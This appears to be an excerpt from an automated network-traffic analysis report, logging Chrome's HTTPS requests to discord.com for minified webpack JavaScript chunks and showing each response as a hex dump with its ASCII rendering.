                                                                          2023-12-10 16:45:18 UTC216INData Raw: 4c 31 34 2e 35 34 38 33 20 31 34 4c 31 32 2e 30 30 35 31 20 31 31 2e 34 34 36 36 4c 39 2e 34 35 31 37 34 20 31 34 4c 38 20 31 32 2e 35 34 38 33 4c 31 30 2e 35 35 33 34 20 39 2e 39 39 34 38 35 4c 38 20 37 2e 34 35 31 37 34 4c 39 2e 34 35 31 37 34 20 36 4c 31 32 2e 30 30 35 31 20 38 2e 35 35 33 34 31 4c 31 34 2e 35 34 38 33 20 36 5a 22 2c 66 69 6c 6c 3a 69 7d 29 7d 29 7d 2c 61 2e 53 63 72 65 65 6e 58 49 63 6f 6e 2c 76 6f 69 64 20 30 2c 7b 73 69 7a 65 3a 32 34 7d 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 37 30 39 34 31 2e 36 31 30 65 64 61 36 62 35 33 36 36 63 38 33 32 38 34 64 38 2e 6a 73 2e 6d 61 70
                                                                          Data Ascii: L14.5483 14L12.0051 11.4466L9.45174 14L8 12.5483L10.5534 9.99485L8 7.45174L9.45174 6L12.0051 8.55341L14.5483 6Z",fill:i})})},a.ScreenXIcon,void 0,{size:24})}}]);//# sourceMappingURL=70941.610eda6b5366c83284d8.js.map


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          317192.168.2.550053162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/62597.1768a5537a0db3f9e8ac.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=o2aDdI7qMt.17pfQ.IoNv.Z4CwoJ.ZSrEKqn0S73gy0-1702226718128-0-604800000
                                                                          2023-12-10 16:45:18 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 33 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 66 64 63 38 66 35 66 32 30 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 13329Connection: closeCF-Ray: 8336f51fdc8f5f20-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 32 35 39 37 22 5d 2c 7b 34 34 37 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 7d 29 2c 73 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 61 3d 73 28 22 33 37 39 38 33 22 29 2c 69 3d 73 28 22 38 38 34 36 39 31 22 29 2c 6e 3d 73 28 22 34 31 34 34 35 36 22 29 2c 72 3d 73 2e 6e 28 6e 29 2c 6c 3d 73 28 22 39 31 37 33 35 31 22 29 2c 64 3d 73 2e 6e 28
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["62597"],{44771:function(e,t,s){"use strict";s.r(t),s.d(t,{default:function(){return S}}),s("222007");var a=s("37983"),i=s("884691"),n=s("414456"),r=s.n(n),l=s("917351"),d=s.n(
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6c 29 2c 75 3d 73 28 22 37 37 30 37 38 22 29 2c 63 3d 73 28 22 31 36 34 35 34 36 22 29 2c 6f 3d 73 28 22 35 31 33 31 39 36 22 29 2c 54 3d 73 28 22 34 32 37 32 33 22 29 2c 6d 3d 73 28 22 36 30 35 34 37 35 22 29 2c 45 3d 73 28 22 34 39 31 31 31 22 29 2c 68 3d 73 28 22 37 38 32 33 34 30 22 29 2c 49 3d 73 28 22 32 37 39 37 33 32 22 29 3b 6c 65 74 20 5f 3d 28 29 3d 3e 5b 68 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 41 50 50 5f 49 43 4f 4e 5f 50 49 52 41 54 45 2c 68 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 41 50 50 5f 49 43 4f 4e 5f 50 49 52 41 54 45 5f 31 2c 68 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 41 50 50 5f 49 43 4f 4e 5f 50 49 52 41 54 45 5f 32 2c 68 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 41 50 50 5f
                                                                          Data Ascii: l),u=s("77078"),c=s("164546"),o=s("513196"),T=s("42723"),m=s("605475"),E=s("49111"),h=s("782340"),I=s("279732");let _=()=>[h.default.Messages.APP_ICON_PIRATE,h.default.Messages.APP_ICON_PIRATE_1,h.default.Messages.APP_ICON_PIRATE_2,h.default.Messages.APP_
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 3d 73 28 22 39 31 33 31 34 34 22 29 2c 6c 3d 73 28 22 38 39 31 36 35 33 22 29 2c 64 3d 73 28 22 34 37 36 37 36 35 22 29 2c 75 3d 73 28 22 38 30 35 31 39 39 22 29 2c 63 3d 73 28 22 34 34 37 37 31 22 29 2c 6f 3d 73 28 22 36 30 35 34 37 35 22 29 2c 54 3d 73 28 22 37 38 32 33 34 30 22 29 2c 6d 3d 73 28 22 31 34 33 35 39 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 2c 64 69 73 61 62 6c 65 64 3a 73 2c 72 65 6e 64 65 72 43 54 41 42 75 74 74 6f 6e 73 3a 45 7d 3d 65 2c 5b 68 2c 49 5d 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 41 72 72 61 79 29 28 5b 75 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 5b 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 44 65 73 6b 74 6f 70 49 63
                                                                          Data Ascii: =s("913144"),l=s("891653"),d=s("476765"),u=s("805199"),c=s("44771"),o=s("605475"),T=s("782340"),m=s("143598");function E(e){let{className:t,disabled:s,renderCTAButtons:E}=e,[h,I]=(0,i.useStateFromStoresArray)([u.default],()=>[u.default.getCurrentDesktopIc
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 21 28 21 65 26 26 28 30 2c 69 2e 68 61 73 41 6e 79 4d 6f 64 61 6c 4f 70 65 6e 29 28 29 29 26 26 28 30 2c 69 2e 6f 70 65 6e 4d 6f 64 61 6c 4c 61 7a 79 29 28 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 65 7d 3d 61 77 61 69 74 20 73 2e 65 6c 28 22 31 37 30 39 33 35 22 29 2e 74 68 65 6e 28 73 2e 62 69 6e 64 28 73 2c 22 31 37 30 39 33 35 22 29 29 3b 72 65 74 75 72 6e 20 74 3d 3e 28 30 2c 61 2e 6a 73 78 29 28 65 2c 7b 2e 2e 2e 74 7d 29 7d 2c 7b 6d 6f 64 61 6c 4b 65 79 3a 6e 2e 43 48 41 4e 47 45 4c 4f 47 5f 4d 4f 44 41 4c 5f 4b 45 59 7d 29 7d 7d 2c 39 32 31 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69
                                                                          Data Ascii: id 0!==arguments[0]&&arguments[0];!(!e&&(0,i.hasAnyModalOpen)())&&(0,i.openModalLazy)(async()=>{let{default:e}=await s.el("170935").then(s.bind(s,"170935"));return t=>(0,a.jsx)(e,{...t})},{modalKey:n.CHANGELOG_MODAL_KEY})}},92130:function(e,t,s){"use stri
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6c 3d 73 28 22 34 34 36 36 37 34 22 29 2c 64 3d 73 28 22 36 36 39 34 39 31 22 29 2c 75 3d 73 28 22 32 36 36 32 22 29 2c 63 3d 73 28 22 38 31 39 38 35 35 22 29 2c 6f 3d 73 28 22 37 37 30 37 38 22 29 2c 54 3d 73 28 22 31 36 31 37 37 38 22 29 2c 6d 3d 73 28 22 35 37 38 37 30 36 22 29 2c 45 3d 73 28 22 32 35 33 35 33 39 22 29 2c 68 3d 73 28 22 39 32 31 33 30 22 29 2c 49 3d 73 28 22 34 39 31 31 31 22 29 2c 5f 3d 73 28 22 37 38 32 33 34 30 22 29 2c 66 3d 73 28 22 38 32 33 34 37 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 53 28 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 66 2e 73 65 6c 65 63 74 69 6f 6e 43 69 72 63 6c 65 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 6d 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: l=s("446674"),d=s("669491"),u=s("2662"),c=s("819855"),o=s("77078"),T=s("161778"),m=s("578706"),E=s("253539"),h=s("92130"),I=s("49111"),_=s("782340"),f=s("823470");function S(){return(0,a.jsx)("div",{className:f.selectionCircle,children:(0,a.jsx)(m.default
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 67 65 73 2e 54 48 45 4d 45 5f 44 41 52 4b 29 2e 77 69 74 68 28 22 73 79 73 74 65 6d 22 2c 28 29 3d 3e 5f 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 54 48 45 4d 45 5f 53 59 53 54 45 4d 29 2e 65 78 68 61 75 73 74 69 76 65 28 29 2c 43 3d 28 30 2c 6f 2e 75 73 65 52 65 64 65 73 69 67 6e 49 63 6f 6e 43 6f 6e 74 65 78 74 29 28 29 2e 65 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 4e 2c 7b 6f 6e 53 65 6c 65 63 74 3a 69 2c 69 73 53 65 6c 65 63 74 65 64 3a 73 2c 6e 61 6d 65 3a 50 2c 63 6c 61 73 73 4e 61 6d 65 3a 6e 28 66 2e 64 65 66 61 75 6c 74 54 68 65 6d 65 53 65 6c 65 63 74 69 6f 6e 2c 53 29 2c 63 68 69 6c 64 72 65 6e 3a 22 73 79 73 74 65 6d 22 3d 3d 3d 74 26 26 28 30 2c 61 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73
                                                                          Data Ascii: ges.THEME_DARK).with("system",()=>_.default.Messages.THEME_SYSTEM).exhaustive(),C=(0,o.useRedesignIconContext)().enabled;return(0,a.jsx)(N,{onSelect:i,isSelected:s,name:P,className:n(f.defaultThemeSelection,S),children:"system"===t&&(0,a.jsx)("div",{class
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 33 39 37 33 33 36 22 29 2c 62 3d 73 28 22 38 34 33 34 35 35 22 29 2c 77 3d 73 28 22 37 38 32 33 34 30 22 29 2c 48 3d 73 28 22 38 30 39 34 30 34 22 29 3b 28 69 3d 61 7c 7c 28 61 3d 7b 7d 29 29 2e 45 44 49 54 4f 52 3d 22 45 44 49 54 4f 52 22 2c 69 2e 53 45 54 54 49 4e 47 53 3d 22 53 45 54 54 49 4e 47 53 22 3b 6c 65 74 20 4c 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 45 44 49 54 4f 52 3a 6b 2e 55 73 65 72 53 65 74 74 69 6e 67 73 44 65 6c 61 79 2e 53 4c 4f 57 5f 55 53 45 52 5f 41 43 54 49 4f 4e 2c 53 45 54 54 49 4e 47 53 3a 6b 2e 55 73 65 72 53 65 74 74 69 6e 67 73 44 65 6c 61 79 2e 49 4e 46 52 45 51 55 45 4e 54 5f 55 53 45 52 5f 41 43 54 49 4f 4e 7d 29 2c 55 3d 72 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 2c 42 3d 65 3d 3e 7b 6c 65 74 7b 69
                                                                          Data Ascii: 397336"),b=s("843455"),w=s("782340"),H=s("809404");(i=a||(a={})).EDITOR="EDITOR",i.SETTINGS="SETTINGS";let L=Object.freeze({EDITOR:k.UserSettingsDelay.SLOW_USER_ACTION,SETTINGS:k.UserSettingsDelay.INFREQUENT_USER_ACTION}),U=r.createContext({}),B=e=>{let{i
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 4d 65 73 73 61 67 65 73 2e 43 4c 49 45 4e 54 5f 54 48 45 4d 45 53 5f 45 44 49 54 4f 52 5f 47 52 41 44 49 45 4e 54 5f 44 45 53 43 52 49 50 54 49 4f 4e 5f 50 52 45 56 49 45 57 5f 57 49 54 48 5f 4c 49 4e 4b 2e 66 6f 72 6d 61 74 28 7b 6f 6e 50 72 65 6d 69 75 6d 43 6c 69 63 6b 3a 66 2e 6e 61 76 69 67 61 74 65 54 6f 50 72 65 6d 69 75 6d 4d 61 72 6b 65 74 69 6e 67 50 61 67 65 7d 29 29 2e 77 69 74 68 28 7b 74 79 70 65 3a 22 45 44 49 54 4f 52 22 2c 69 73 43 6f 61 63 68 6d 61 72 6b 3a 21 30 7d 2c 28 29 3d 3e 77 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 43 4c 49 45 4e 54 5f 54 48 45 4d 45 53 5f 45 44 49 54 4f 52 5f 47 52 41 44 49 45 4e 54 5f 44 45 53 43 52 49 50 54 49 4f 4e 5f 43 4f 41 43 48 4d 41 52 4b 29 2e 77 69 74 68 28 7b 74 79 70 65 3a 22 45 44 49
                                                                          Data Ascii: Messages.CLIENT_THEMES_EDITOR_GRADIENT_DESCRIPTION_PREVIEW_WITH_LINK.format({onPremiumClick:f.navigateToPremiumMarketingPage})).with({type:"EDITOR",isCoachmark:!0},()=>w.default.Messages.CLIENT_THEMES_EDITOR_GRADIENT_DESCRIPTION_COACHMARK).with({type:"EDI
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 28 30 2c 6e 2e 6a 73 78 73 29 28 22 73 65 63 74 69 6f 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 64 28 48 2e 70 72 65 73 65 74 73 2c 74 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 44 2e 44 65 66 61 75 6c 74 54 68 65 6d 65 53 65 6c 65 63 74 69 6f 6e 2c 7b 74 68 65 6d 65 3a 62 2e 54 68 65 6d 65 54 79 70 65 73 2e 4c 49 47 48 54 2c 69 73 53 65 6c 65 63 74 65 64 3a 6c 26 26 21 75 26 26 28 30 2c 54 2e 69 73 54 68 65 6d 65 4c 69 67 68 74 29 28 69 29 2c 6f 6e 53 65 6c 65 63 74 3a 28 29 3d 3e 6f 28 62 2e 54 68 65 6d 65 54 79 70 65 73 2e 4c 49 47 48 54 29 7d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 44 2e 44 65 66 61 75 6c 74 54 68 65 6d 65 53 65 6c 65 63 74 69 6f 6e 2c 7b 74 68 65 6d 65 3a 62 2e 54 68 65 6d 65 54 79 70 65 73 2e 44 41 52 4b 2c 69 73
                                                                          Data Ascii: (0,n.jsxs)("section",{className:d(H.presets,t),children:[(0,n.jsx)(D.DefaultThemeSelection,{theme:b.ThemeTypes.LIGHT,isSelected:l&&!u&&(0,T.isThemeLight)(i),onSelect:()=>o(b.ThemeTypes.LIGHT)}),(0,n.jsx)(D.DefaultThemeSelection,{theme:b.ThemeTypes.DARK,is


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          318192.168.2.550054162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/53509.d075f1bff85f12b95485.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=o2aDdI7qMt.17pfQ.IoNv.Z4CwoJ.ZSrEKqn0S73gy0-1702226718128-0-604800000
                                                                          2023-12-10 16:45:18 UTC966INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 30 39 64 32 38 34 63 30 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 9618Connection: closeCF-Ray: 8336f5209d284c0c-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:18 UTC403INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 33 35 30 39 22 5d 2c 7b 37 31 33 38 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 64 2e 72 28 74 29 2c 64 2e 64 28 74 2c 7b 73 65 6e 64 46 65 65 64 53 68 6f 77 6e 41 6e 61 6c 79 74 69 63 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 2c 66 65 74 63 68 47 75 69 6c 64 46 65 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 2c 6d 61 72 6b 47 75 69 6c 64 46 65 65 64 49 74 65 6d 41 73 53 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 7d
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["53509"],{713810:function(e,t,d){"use strict";d.r(t),d.d(t,{sendFeedShownAnalytics:function(){return A},fetchGuildFeed:function(){return G},markGuildFeedItemAsSeen:function(){return M}
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 65 64 46 65 61 74 75 72 65 64 49 74 65 6d 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 2c 66 65 61 74 75 72 65 47 75 69 6c 64 46 65 65 64 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 75 6e 66 65 61 74 75 72 65 47 75 69 6c 64 46 65 65 64 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 2c 75 6e 68 69 64 65 49 74 65 6d 46 72 6f 6d 47 75 69 6c 64 46 65 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 48 7d 2c 73 65 74 46 65 65 64 49 74 65 6d 50 72 65 66 65 72 65 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 2c 74 72 61 63 6b 46 65 65 64 49 74 65 6d 49 6e 74 65 72 61 63 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 7d
                                                                          Data Ascii: edFeaturedItems:function(){return k},featureGuildFeedItem:function(){return C},unfeatureGuildFeedItem:function(){return w},unhideItemFromGuildFeed:function(){return H},setFeedItemPreference:function(){return N},trackFeedItemInteracted:function(){return O}
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 64 3a 6c 2e 63 68 61 6e 6e 65 6c 49 64 2c 68 69 67 68 6c 69 67 68 74 5f 6d 65 73 73 61 67 65 5f 69 64 3a 6c 2e 6d 65 73 73 61 67 65 49 64 7d 7d 2c 64 3d 61 77 61 69 74 20 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 54 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 46 45 45 44 28 74 29 2c 71 75 65 72 79 3a 65 7d 29 2c 45 3d 64 2e 62 6f 64 79 2c 68 3d 6d 2e 64 65 66 61 75 6c 74 2e 67 65 74 46 65 65 64 49 74 65 6d 53 65 63 74 69 6f 6e 28 74 2c 79 2e 47 75 69 6c 64 46 65 65 64 53 65 63 74 69 6f 6e 54 79 70 65 73 2e 52 45 41 44 29 2e 6d 61 70 28 65 3d 3e 65 2e 69 64 29 2c 70 3d 6d 2e 64 65 66 61 75 6c 74 2e 67 65 74 46 65 65 64 49 74 65 6d 53 65 63 74 69 6f 6e 28 74 2c 79 2e 47 75 69 6c 64 46 65 65 64 53 65 63 74 69 6f 6e 54 79 70 65 73 2e 55
                                                                          Data Ascii: d:l.channelId,highlight_message_id:l.messageId}},d=await s.default.get({url:T.Endpoints.GUILD_FEED(t),query:e}),E=d.body,h=m.default.getFeedItemSection(t,y.GuildFeedSectionTypes.READ).map(e=>e.id),p=m.default.getFeedItemSection(t,y.GuildFeedSectionTypes.U
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 3b 64 2e 6c 65 6e 67 74 68 3e 30 26 26 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 41 44 5f 54 48 52 45 41 44 53 5f 53 55 43 43 45 53 53 22 2c 74 68 72 65 61 64 73 3a 64 2e 6d 61 70 28 65 3d 3e 65 2e 74 68 72 65 61 64 29 2c 66 69 72 73 74 4d 65 73 73 61 67 65 73 3a 64 2e 6d 61 70 28 65 3d 3e 65 2e 6d 65 73 73 61 67 65 29 2c 67 75 69 6c 64 49 64 3a 65 7d 29 7d 28 74 2c 45 29 7d 63 61 74 63 68 28 65 29 7b 74 68 72 6f 77 20 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 46 45 45 44 5f 46 45 54 43 48 5f 46 41 49 4c 55 52 45 22 2c 67 75 69 6c 64 49 64 3a 74 2c 65 72 72 6f 72 3a 6e 65 77 20 45 2e 64 65 66 61 75 6c 74 28 65 29 7d 29 2c 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d
                                                                          Data Ascii: ;d.length>0&&r.default.dispatch({type:"LOAD_THREADS_SUCCESS",threads:d.map(e=>e.thread),firstMessages:d.map(e=>e.message),guildId:e})}(t,E)}catch(e){throw r.default.dispatch({type:"GUILD_FEED_FETCH_FAILURE",guildId:t,error:new E.default(e)}),e}}function M
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 79 70 65 3a 6c 7d 3d 28 30 2c 44 2e 64 65 66 61 75 6c 74 29 28 65 29 3b 74 72 79 7b 6c 65 74 20 75 3d 61 77 61 69 74 20 73 2e 64 65 66 61 75 6c 74 2e 70 75 74 28 7b 75 72 6c 3a 54 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 46 45 45 44 5f 46 45 41 54 55 52 45 5f 49 54 45 4d 28 61 29 2c 62 6f 64 79 3a 7b 65 6e 74 69 74 79 5f 69 64 3a 6e 2c 65 6e 74 69 74 79 5f 74 79 70 65 3a 6c 2c 65 78 70 69 72 65 73 5f 61 74 3a 74 2c 64 65 74 61 69 6c 73 3a 69 7d 7d 29 3b 72 65 74 75 72 6e 20 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 46 45 45 44 5f 46 45 41 54 55 52 45 5f 49 54 45 4d 22 2c 66 65 61 74 75 72 65 61 62 6c 65 49 74 65 6d 3a 65 2c 6f 70 74 69 6f 6e 73 3a 64 7d 29 2c 75 7d 63 61 74 63 68 28 65 29 7b
                                                                          Data Ascii: ype:l}=(0,D.default)(e);try{let u=await s.default.put({url:T.Endpoints.GUILD_FEED_FEATURE_ITEM(a),body:{entity_id:n,entity_type:l,expires_at:t,details:i}});return r.default.dispatch({type:"GUILD_FEED_FEATURE_ITEM",featureableItem:e,options:d}),u}catch(e){
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 30 39 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 64 2e 72 28 74 29 2c 64 2e 64 28 74 2c 7b 67 65 74 47 75 69 6c 64 46 65 65 64 53 65 65 6e 4d 61 6e 61 67 65 72 49 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 29 2c 64 28 22 32 32 32 30 30 37 22 29 2c 64 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6e 2c 69 3d 64 28 22 38 37 32 37 31 37 22 29 2c 61 3d 64 28 22 39 31 33 31 34 34 22 29 2c 6c 3d 64 28 22 32 36 33 30 32 34 22 29 2c 75 3d 64 28 22 36 36 30 34 37 38 22 29 2c 73 3d 64 28 22 33 39 35 31 31 38 22 29 2c 72 3d 64 28 22 35 39 39 31 31 30 22 29 2c 45 3d 64 28 22 34 34 39 30 30 38 22 29 2c 6f
